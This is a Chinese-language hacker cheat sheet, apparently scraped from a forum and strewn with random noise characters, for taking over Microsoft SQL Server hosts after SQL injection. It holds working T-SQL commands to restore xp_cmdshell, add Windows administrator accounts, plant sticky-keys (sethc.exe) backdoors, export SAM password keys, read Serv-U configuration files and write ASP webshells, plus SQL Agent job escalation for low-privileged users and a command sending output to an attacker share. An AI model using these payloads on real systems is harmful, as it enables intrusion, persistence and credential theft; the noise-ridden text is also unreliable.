1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
' e8 X: Q3 w. F恢复方法:查询分离器连接后,
1 V$ V/ k' d) p; j9 r第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
; T) A, D& |8 F X第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 5 _9 |$ [+ N, i: w5 n6 e
然后按F5键命令执行完毕
, I0 u; |3 q' S0 s, \5 t- b0 w6 k3 Q/ p8 p- Z9 d" g
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
; R+ z6 z9 e8 z8 p恢复方法:查询分离器连接后,
. v: q: W( H! q7 Q第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
* J6 c4 k' Z$ q! y第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'0 Y9 c, a, [& C! p
然后按F5键命令执行完毕! |; y' u5 |; |1 V
4 m" M/ _2 A" v: X" O2 P: Y
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
2 G7 T* Y2 w2 S" @1 _% h) d; j恢复方法:查询分离器连接后,
! o7 d5 O' l1 y3 j& a4 a第一步执行:exec sp_dropextendedproc 'xp_cmdshell'5 _( {9 l8 t2 [% c2 D( l9 T+ D
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' ' \# x% b0 o% M- [) p' G
然后按F5键命令执行完毕 t1 N7 s1 a& x: o/ y$ F9 c
0 h/ t. s6 K) z4 终极方法.
& h! H9 d* a5 s9 T如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:- q! y( I# q- ?' m) g: T! ]" j
查询分离器连接后,
- G2 [& I' k+ s ?6 ^: R2000servser系统:) b9 b' T8 o9 H# J! U3 n2 N3 }
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
' V' q! D, J% l$ @5 K5 ?, @! o- J/ }0 V5 H* H- M! Y$ H/ k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
- B/ ^. A4 t# K: K. ?/ D$ s. j6 {8 D% I' U% y) ~1 ]
xp或2003server系统:" y! w# ?/ M& u& A- c) P5 _# K7 \
4 P- G2 u5 P) M+ f7 adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
/ c/ D8 z: \% _( `0 s
5 G' z3 Q5 z# z% @: v& r/ g' [# fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'. G. E7 A1 S4 r2 {. k8 Z
* j3 T$ W6 g% ?! g- ~( \) v. Q% r4 J) j8 w
五个SHIFT) W- a$ [* Y7 B$ G$ P* s6 P- c( Q
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';0 ~/ E' l) }7 T/ S
4 I! V" e- L7 k$ e5 i4 k+ ~
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
3 v6 c! l# W. a5 }2 K8 N: J) y; ]- ^
xp_cmdshell执行命令另一种方法; y) c2 z x9 U5 ^( E
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add' " o1 r( t' j2 ~6 Y, W; C
& Q+ _/ q9 d U# ]5 a: @. @- e
判断存储扩展是否存在
2 R9 N- }" h1 H- c) s1 w& W" x5 j& h; QSelect count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
; J! n+ w& L" E! q" L9 I1 u: a返回结果为1就OK
5 | N4 \4 j" ~& {! B# t* z: u8 Q6 d. p( S$ f5 G3 Z4 a% p( Y+ c
1 y6 {" ^1 W2 N5 x上传xplog70.dll恢复xp_cmdshell语句:* w6 v! c& Q- j) @) Y) t
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'6 O2 ^) i: W3 o$ j6 j
: {( k" Y; G7 p, \1 C- _% H4 b& u否则上传xplog7.0.dll
9 w. f+ A8 I% g, IExec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
3 W9 W, c" t4 Q
. u% j: N& u+ d: J: T8 P
% G7 |0 H2 Z6 Y/ r8 b5 {. A: }3 C! H) X( P7 K- s7 f1 x3 _) ^, ?
首先开启沙盘模式:
& p* l6 _( A( {6 X) B1 J+ Nexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
3 M0 Z0 Z# @: b3 A+ B! a; \5 F2 D) w! e
然后利用jet.oledb执行系统命令: t& K7 q$ A0 w& @
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
) } V# m {7 U1 o返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
) a0 T' D* ]: J& k; ~ j1 h) O$ R
2 f5 E' z2 F F4 |7 g+ l e/ E( K& U& w' `' \
2 s7 X7 m$ T) j2 w2 B7 L4 Z
恢复过程sp_addextendedproc 如下:
& R! ?5 s$ S, ~1 N' z/ i1 ]create procedure sp_addextendedproc --- 1996/08/30 20:13
& d N* U. X* u7 N/ \. o@functname nvarchar(517),/* (owner.)name of function to call */
5 m! w$ _$ R% Y! d: j@dllname varchar(255)/* name of DLL containing function */ / }0 w1 |( \& p [' [( u+ e5 Y
as
" Y: y0 l8 ^1 ^5 ~2 w$ oset implicit_transactions off * H1 N9 E1 s. E
if @@trancount > 0
. u% U" p. Z, r7 C* C0 Vbegin
8 i- ?0 O1 }- z* D( praiserror(15002,-1,-1,'sp_addextendedproc')
( m' H" m: c2 P: c1 v, Creturn (1)
7 v1 z) ~, t5 k' _6 N+ B+ }4 Aend
3 [6 J) Q, Q# e) wdbcc addextendedproc( @functname, @dllname) 8 T/ a V. v k+ H% ?5 t
return (0) -- sp_addextendedproc ], U0 [# \: p% l
GO
; c9 @* N2 U) l/ ]( P9 E2 `& M7 X1 E% Z* M
! t# o' l$ V% Y7 B! L% v
4 r( ?+ j; u& A* r% T导出管理员密码文件
" m5 J- [# z) N# Psa默认可以读sam键.应该。
! i# B* v7 v0 E9 H2 t' z& o# xreg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
7 v' a0 B. j6 `% qnet user administrator test
2 u- m# }4 d% x. ]. C* H用administrator登陆.
! l, o. x8 h( {, J% h7 b+ j用完机器后. Z: Q" {# ~$ ~6 s9 ~4 K
reg import c:\test.reg
4 k' G: Q; |# w根本不用克隆.$ y$ _( s! Q: X! n2 m! K9 N& X: K; D
找到对应的sid. 6 Z1 V9 K% `. k
& \( j" W3 _5 Z+ K' _7 i" [
5 A' V u+ y9 D! P. u
?3 Q$ Z) k8 f E: o1 I恢复所有存储过程/ ~+ n( Z# ^' L3 G
use master ; m1 b# e& r! o6 W& L
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
/ f5 C0 k* O2 M( B7 n* s8 yexec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
" K i& |6 c2 D+ B( u+ ]exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
6 s, h6 D* i: G8 i4 X0 B7 {) @exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' . Y0 s" B( d$ a- {+ c4 J3 y
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' ) z3 [' k4 Z. m6 a: Y5 a
exec sp_addextendedproc sp_OACreate,'odsole70.dll' 6 d! I5 H: o! [; Y3 f( \- x
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
7 e% |. Q, Y- f' V/ F4 Nexec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' 9 ?0 _7 e! C( F
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
& q3 v) k# a7 W ?; t! x" I! Uexec sp_addextendedproc sp_OAMethod,'odsole70.dll' # u; S4 ?% F4 q- p
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
9 r$ s6 m5 s) M% J/ y. m8 \exec sp_addextendedproc sp_OAStop,'odsole70.dll' # G$ q% }) `+ Q2 y* L- O6 V0 ]
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
8 o) o3 H- L1 D( D! u) ? pexec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
: O9 A5 f' a! o3 N6 D" u- {: \0 q* cexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' : `; S- w/ ]& @/ J1 q
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' $ i* x6 y, q6 ^5 W$ F% Z- g
exec sp_addextendedproc xp_regread,'xpstar.dll' 7 S$ Z0 y q: P
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' # {/ Q9 f- w0 ` v# ^9 I& o
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
) l; Z8 U' S. texec sp_addextendedproc xp_availablemedia,'xpstar.dll'
7 l' z' ]# U+ U+ r; }" F9 p
I; |: Z* [4 _
9 p( a' s0 z) s$ y, l, P- p+ k建立读文件的存储过程6 `; N) G% ~3 u% e: C/ y& q
Create proc sp_readTextFile @filename sysname8 N# _2 R2 @' y
as$ Y- C/ q4 S- y
" ~8 G1 |, b9 M$ e
begin : P) v4 l( N2 o7 c6 I8 Z, `
set nocount on
3 u" A+ n' S' ^+ a2 ~ Create table #tempfile (line varchar(8000))& C4 J/ F6 S5 X* p
exec ('bulk insert #tempfile from "' + @filename + '"')
1 t3 C$ |" Z$ i* M8 L: U select * from #tempfile
+ c% a; O; i* o5 T7 ?. h6 i2 ? drop table #tempfile
; @2 H5 U5 I8 p. yEnd
1 q. c: {* H) A& e" D& _0 C; X2 D$ Q3 S8 ]: l
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
5 b/ P; ^6 F/ O/ C- F" ^查看登录用户: d7 `" Y# e4 ?/ b
Select * from sysxlogins
_, m6 Z' ~; D( @' \% \5 r& f
9 Y: f! n. ]; y3 h* L, I把文件内容读取到表中
]* M% R5 X5 l/ N8 J: NBULK INSERT tmp from "c:\test.txt"; Q; \3 u4 y2 `+ ]
dElete from 表名 清理表里的内容% _% r) F& ~$ D. _3 R8 ~* c
create table b_test(fn nvarchar(4000));建一个表,字段为fn
) ?4 D: i' I& T+ ^9 t e
! z: f% w0 X0 K, F' A: n$ |7 @" }/ P& O7 S3 d3 k8 `. e
加sa用户( i8 G& m/ {, h& _& x
exec master.dbo.sp_addlogin user,pass;
' l# M% @* t0 w7 c# n& uexec master.dbo.sp_addsrvrolemember user,sysadmin. n( v+ W2 b0 l I, G6 u' x" \2 b
M! r2 a) H$ j" b) v. G( c# m
! u; v% R! N" K! K0 J1 r. K1 T读文件代码5 c% V) A1 y: I8 J7 b
declare @o int, @f int, @t int, @ret int+ W7 b9 |" H6 v/ ^$ Q
declare @line varchar(8000)
2 g2 \4 h% T( w4 Y0 u$ N4 W- ~exec sp_oacreate 'scripting.filesystemobject', @o out/ q+ E# ~% t" m
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
: _* r1 _* |( M3 l& ^: F6 T& Qexec @ret = sp_oamethod @f, 'readline', @line out
4 Z2 y- ?4 Z2 H: e- \while( @ret = 0 )
3 I1 J) J2 m: o* E4 fbegin* j9 B# I4 A; f" j( R
print @line, {$ R8 X, j, e$ ` `
exec @ret = sp_oamethod @f, 'readline', @line out, r0 ^- }# k- @: s
end# s( i7 W; P2 z3 _8 S' Q" @
# T D6 i2 p7 X( p
6 F0 g4 R6 [# O$ g! Y写文件代码:
* A1 ]9 N$ Z4 l' hdeclare @o int, @f int, @t int, @ret int
8 Q; ^. j! _- fexec sp_oacreate 'scripting.filesystemobject', @o out
) E) @4 s' m! D/ `, [9 U# l4 ^exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1. x4 i9 a8 {3 s/ U
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
; D5 n* V; I0 d% d% `0 I |/ s: U; H
& C4 _0 P: W0 K8 U添加lake2 shell2 V- _4 t, I: ~3 n6 C9 O E- a
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
0 I2 [- K) l+ Tsp_dropextendedproc xp_lake2, R$ G" U0 M. h& e G
EXEC xp_lake2 'net user'6 h3 P" ]8 g2 o! D! b- @
, n8 i% h. }) K) B( J
2 B; d" F0 O3 _5 _得到硬盘文件信息
, o4 e6 b+ c; J5 I--参数说明:目录名,目录深度,是否显示文件
+ b$ N8 c! w5 q* |execute master..xp_dirtree 'c:' , O% q+ C$ h, B* {! y# Z: x
execute master..xp_dirtree 'c:',1 . i) L9 V. c0 R' o
execute master..xp_dirtree 'c:',1,1 # k7 f( r. a9 `8 r" u% { _" ~
4 u- b" p% I+ x% E' _
* F5 ~5 L7 Y$ v. U+ F- S0 t* C读serv-u配置信息
9 i j. Y' @* gexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'+ H) y9 b3 q9 ]) b
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'+ K" E ^6 K. q- y3 [+ {; A
T9 h( J# v1 {) U! Q2 `通过xp_regwrite写SHIFT后门4 k6 I0 m p m4 Y
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--7 N3 C0 U& j5 w+ E- }# G
6 e5 N, u( v8 m3 y, p, D/ S
G4 c3 R0 z. T
4 K/ n, u( P& _$ @2 t6 S- Q找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';$ _" X6 f* O+ C1 R4 q+ g6 m! ?- p
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
) F1 M4 L& v+ J R
0 w/ q" K$ Y5 O' J; U5 cEXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
7 R2 V; [7 b% ]+ @4 J5 W( r
3 X1 z, K0 R3 f, G/ v
$ t7 F& e* ?2 f0 n8 q9 n# ~2 E9 m* k( `* o1 `1 k) t
sql server 2005下开启xp_cmdshell的办法* X; f1 y3 p- P
6 x( S0 {- @ X5 ]1 m* oEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; K/ d' c5 d9 `* ~5 r
" ?6 J/ L' K% x1 S6 [SQL2005开启'OPENROWSET'支持的方法:
2 I" w4 A& U; }6 R! F% a7 G( ?" M. D# B0 N- s
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
1 `$ H6 Z. n% U; ?; @8 @4 d5 e U. q3 I4 e- ]; y- y# L( ^
SQL2005开启'sp_oacreate'支持的方法:
( ]6 q$ K% S5 D, \- u) b/ K1 A* l, R3 q7 l9 @- A1 ]. j% f, O$ a0 v
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
' U% U7 w0 Z% O, x; @3 J
2 V% M! E% y4 z# }# e' i
. a% Z! M0 l4 y7 p$ h* b) W6 ]7 _; }4 z( T
% [4 e/ [5 j9 T; Y1 [2 B! s
' {# h; u7 T4 y9 z; _: _4 S/ x
) X9 E7 e' i W! k* W }# N# w, ] z6 ^5 A% A" t" G* \, B7 t
6 n$ G( p, g8 o3 t
. @: y( E0 F5 i! E4 T# N% i
) l: }% M* {$ E3 T% c1 i
: K7 j2 ?, G: z2 W
/ a( V$ j5 o" n8 `1 M5 \- N7 \" Z0 U! k1 A# D5 R) J- B
+ a' E L! n( \- P+ E/ n+ r* u) O. C& a5 W( L
. N, w. _1 o8 l3 r
' H0 D' _/ g% D" T) O4 I! O3 n
7 h4 w! h6 W4 S4 O* l( q' L. j: z1 O' t3 H |& E' w1 |. N
, M' |6 Y) m! D* `7 i
7 P+ F4 ^2 U B$ O2 J" y3 R. [
& ~( j; Y- G0 S2 F
/ D C3 b6 D1 S6 F0 w- S1 S9 _2 }* g# N, m* d3 _! {2 ]5 T. i
以下方面不知道能不能成功暂且留下研究哈:
4 J/ @; } F$ a% r( c" J3 h* P4)8 z3 ^ w3 i& y& k
use msdb; --这儿不要是master哟, `6 t; U6 U7 r) F5 W
exec sp_add_job @job_name= czy82 ;( u6 T2 G: ~% j' i
exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
6 M! \9 U6 m- d" r+ Y' nexec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ; }8 E/ i6 v7 M( e" p$ t& q
exec sp_start_job @job_name= czy82 ;
% j) Q0 w3 p( q3 y& ?5 S: ` g1 U7 A7 V8 I; H# j" k
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
* [4 [7 q, j% A( ~; w执行tsql语句了.# A! c( B$ x2 S- Z
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名$ P% I) M1 D( i: X
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)" P& v \7 P2 A' F, n
net start SQLSERVERAGENT0 [, [1 k* F. m! z' }
7 r, w% V! G7 J% T! T' T对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
) H7 q" t/ Z2 ?! [& X4 [USE msdb0 V& `8 F* Z$ b" Y7 |
EXEC sp_add_job @job_name = GetSystemOnSQL ,
$ ^1 ?! p7 C8 F6 W+ L: `) R+ ^# F@enabled = 1,
# }& @2 F( U p6 U! A: p@description = This will give a low privileged user access to) a, }: S" Z5 F- H V
xp_cmdshell ,
0 @# D3 W1 N% [' |( c3 a@delete_level = 1; \: y9 ^* V+ [" G/ J( b
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,- }" j+ l x7 |9 J
@step_name = Exec my sql ,
0 T( r' D3 e8 y L, q@subsystem = TSQL ,
3 Z4 H. N& l0 f$ o@command = exec master..xp_execresultset N select exec3 X0 j N4 Y g3 B
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
. B5 a! U) I/ r, T5 lEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
3 Z) S9 K& i5 W2 c: G8 k+ o7 U) w@server_name = 你的SQL的服务器名 1 {' ~# a# d1 a5 v* |
EXEC sp_start_job @job_name = GetSystemOnSQL * ?2 ^% b. O* N/ r% D5 K
! k \8 z% m+ ^9 I! k不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以) Y! k3 |9 c4 h8 C
才让我们可以以public执行xp_cmdshell
: C# ], }5 H% a4 ]/ n# z
/ j1 G, q5 m. y6 p) M; h5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
! F/ ~* j& Z! y' d4 ^4 ]! L. X在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968! J+ Y6 l6 u- N( D
9 n, i* }6 K4 V, G
USE msdb
+ o5 g8 L! }" S, E# pEXEC sp_add_job @job_name = ArbitraryFilecreate ,
9 T o8 O% j# V0 j! B7 G- J% g@enabled = 1,
4 g9 M+ m% l. y& W@description = This will create a file called c:\sqlafc123.txt ,! n; J1 _% ^- n, Z9 j
@delete_level = 1# ]% j; V/ k5 ~
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,/ }9 x4 g0 w$ ?( n& ?6 ?1 a/ e
@step_name = SQLAFC ,3 t3 N. m; _. ^; l* d
@subsystem = TSQL ,- w+ y; k! C6 Q& ] y+ z8 K4 i, R2 H
@command = select hello, this file was created by the SQL Agent. ,
9 n" \+ Q- Z- k b# R' [@output_file_name = c:\sqlafc123.txt
0 L4 X# j& `8 c) @4 k2 VEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,) w, C1 I- W5 u) _, n: O# n! n
@server_name = SERVER_NAME
3 `, a$ o4 U$ n( Z) ~EXEC sp_start_job @job_name = ArbitraryFilecreate
1 l( K9 c L: v5 t# E: Z1 v6 _7 m& C6 ^; o, J# [% w# `: i% P
如果subsystem选的是:tsql,在生成的文件的头部有如下内容
" H( i# T) T# H9 t" @& |1 U2 ` S9 t- ^7 E" `$ }' f" f# e/ f
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19$ D8 x3 S* Q- D4 F
----------------------------------------------
7 _; }1 p/ V8 y2 |7 v5 ahello, this file was created by the SQL Agent.
; F. G5 k) }+ ~2 w5 W' O0 z
6 a" E& ~/ C$ w- [$ }(1 ?????)% { v& I6 F3 @+ q
/ U3 M6 c- O- M% Z1 R0 \所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
5 p) N# @" f% Q" b1 N( z命令的vbs文件到启动目录!( f6 q$ G2 L; P5 a$ z
/ Z5 ]9 h3 s" {0 Q0 v. n6)关于sp_makewebtask(可以写任意内容任意文件名的文件)% S) I% P" }$ L
关于sp_MScopyscriptfile 看下面的例子1 B+ s! d: ?5 ]* c
declare @command varchar(100) ) R7 I2 i( T+ w, V
declare @scripfile varchar(200) # O, T9 E& Z; _6 M- u) X" s
set concat_null_yields_null off
3 m: q& x/ k3 X- \5 m7 Vselect @command= dir c:\ > "\\attackerip\share\dir.txt"
( w' o4 ]- X9 e) U3 l6 V2 kselect @scripfile= c:\autoexec.bat > nul" | @command | rd "
9 S! Y; l: e( P% w$ `$ c5 A Dexec sp_MScopyscriptfile @scripfile ,
: D: i; K" W2 W& d- N+ R. K; t7 z1 E3 G7 c
这两个东东都还在测试试哟/ ^+ @* d. H! e+ x9 h% @! g. u
让MSSQL的public用户得到一个本机的web shell . J7 x+ P" f2 M- l& H5 g6 f
, ^# P* R" A$ h: M1 H
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,8 z1 e0 s$ X" ]/ ^' M
--@query= select <img src=vbscript:msgbox(now())> 3 P9 j, B4 x) L$ v
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
# j0 o* B% \/ N5 X" ^& P/ O6 E@query= select ! x; N. X$ z& h( z: g0 G1 j; I
<%On Error Resume Next # F2 `8 r9 P( J: g) u3 @! T! G
Set oscript = Server.createObject("wscript.SHELL")
' W' c" f' v$ v* b$ F+ @Set oscriptNet = Server.createObject("wscript.NETWORK") ; ^5 Z! S* R4 p+ z9 z( ~8 s
Set oFileSys = Server.createObject("scripting.FileSystemObject") 1 g! `4 E% P- ^& |2 ?
szCMD = Request.Form(".CMD")
# o# r. `1 ^ HIf (szCMD <>"")Then
$ o! W, G0 m5 tszTempFile = "C:\" & oFileSys.GetTempName()
) w8 g& X+ I2 W7 kCall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) ' a9 ?( p& X2 l( i0 x
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
- x0 l4 Y y" Y8 C: PEnd If %> # U5 O( B8 B& x
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST"> 2 }, @; _% A, W; T4 R
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"> 8 \" K* H7 C7 o3 V3 u2 X
</FORM>< RE>
& ]6 \8 t" [% S) t9 u0 s<% If (IsObject(oFile))Then
$ K3 Y, d% k6 d, y; y. BOn Error Resume Next
( O" U2 x( B- p b/ [Response.Write Server.HTMLEncode(oFile.ReadAll)
. n# w! ~* E: O+ F$ ^8 ]oFile.Close
# a; ]7 p- B+ B. eCall oFileSys.deleteFile(szTempFile, True)
3 x& \+ E+ ]) y( U- a7 G* `End If%> * E) D E( A/ ?) s" N V4 b0 f
</BODY></HTML>
8 r4 X; W. d4 H$ g |